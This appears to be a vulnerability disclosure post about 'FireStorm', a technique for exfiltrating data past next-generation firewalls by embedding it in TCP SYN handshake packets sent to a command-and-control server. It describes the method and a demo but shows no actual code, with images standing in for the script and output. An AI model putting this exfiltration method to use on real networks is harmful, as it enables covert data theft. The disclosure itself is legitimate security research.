BugSec Group and Cynet discovered a severe vulnerability in Next Generation Firewalls. Head of Offensive Security Stas Volfus uncovered the vulnerability, dubbed FireStorm, which allows an internal entity or malicious code to interact and extract data out of the organization, completely bypassing the firewall limitation.

It was discovered that the firewalls are designed to permit full TCP handshake regardless of the packet destination, in order to gather enough content for it to identify which application protocol is being used (web-browsing/telnet etc.). This is applicable if the devices are configured, for example, to allow Web browsing (HTTP/S) traffic from the LAN environment to specific locations on the internet (URL Filtering). This is true even with a single location.
This allowed us to perform a full TCP handshake via the HTTP port with a C&C (Command and Control) server hosted by BugSec.

From there, we were able to forge messages and tunnel them out through the TCP handshake process, bypassing the firewall to any destination on the Internet, regardless of firewall rules and client restrictions.

NGFWs post pic1It is important to mention that any traffic that was sent to the C&C server after the TCP handshake process was blocked immediately by the firewall since the policy manager categorized our traffic as “Unknown-TCP” and the HTTP destination wasn’t allowed.

This flaw can be exploited by malware and hackers to communicate with unauthorized servers on the internet by taking advantage of the ability to perform the TCP handshake process with any destination. This basically completely removes the firewall block from the LAN to the outside world.

Together with Chief Technology Officer Idan Cohen, the team created a tool (which won’t be disclosed) that extracts sensitive data from the LAN, using only the TCP handshake. The tool allows full tunneling over TCP handshake.
A simple example of the vulnerability can be demonstrated using a python script located in the LAN, and a sniffer which is located on a C&C server. The client script sends TCP SYN packets with the string “This is a secret…” to the C&C server, and the server captures it. During our tests, we were able to successfully extract data proving the vulnerability.

CLIENT SCRIPT (PYTHON)

ngfw post pic2

After running the client side python script, this is the result on the server (using TCPDUMP filter by SYN packets):

ngfw post pic3

We disclosed the full details of the vulnerability to major vendors affected by the flaw. One of the vendors who replied, explained that they do not see this issue as a vulnerability because, by design, their firewall permits full TCP handshake in order to inspect the application type.

They said that once their state machine proceeded beyond the TCP handshake, they would recognize the application, matching a subsequent rule that applied to application traffic. The vendor added that if there was an application they did not recognize, they would treat the session as ‘unknown-TCP’ and, again, perform an additional security policy lookup to decide whether to allow or block the traffic.

We believe that this is a dangerous vulnerability and that monitor ability should be added to provide blocking capabilities on repeated suspicious requests and to provide the ability to block a direct connection between an internal host and an unauthenticated foreign host.